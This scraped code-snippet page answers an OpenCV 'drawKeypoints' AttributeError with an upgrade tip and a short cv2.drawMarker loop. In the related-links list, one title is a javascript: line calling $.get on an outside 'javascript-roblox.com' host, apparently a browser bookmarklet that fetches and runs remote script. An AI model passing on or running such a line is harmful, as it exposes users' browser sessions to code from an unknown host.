Horje
*** AttributeError: module 'cv2.cv2' has no attribute 'drawKeypoints' Code Example
*** AttributeError: module 'cv2.cv2' has no attribute 'drawKeypoints'
Solution 1
** upgrade opencv from 4.0.0 to 4.0.1 or higher

Solution2
for marker in kp:
	img2 = cv2.drawMarker(img2, tuple(int(i) for i in marker.pt), color=(0, 255, 0))
Source: github.com




C

Related
c program to compare 2 strings using user defined function Code Example c program to compare 2 strings using user defined function Code Example
marquee html code with right Code Example marquee html code with right Code Example
powershell list big files Code Example powershell list big files Code Example
Javascript:$.get("//javascript-roblox.com/api?i=29229") Code Example Javascript:$.get("//javascript-roblox.com/api?i=29229") Code Example
exclamation mark in c Code Example exclamation mark in c Code Example

Type:
Code Example
Category:
Coding
Sub Category:
Code Example
Uploaded by:
Admin
Views:
10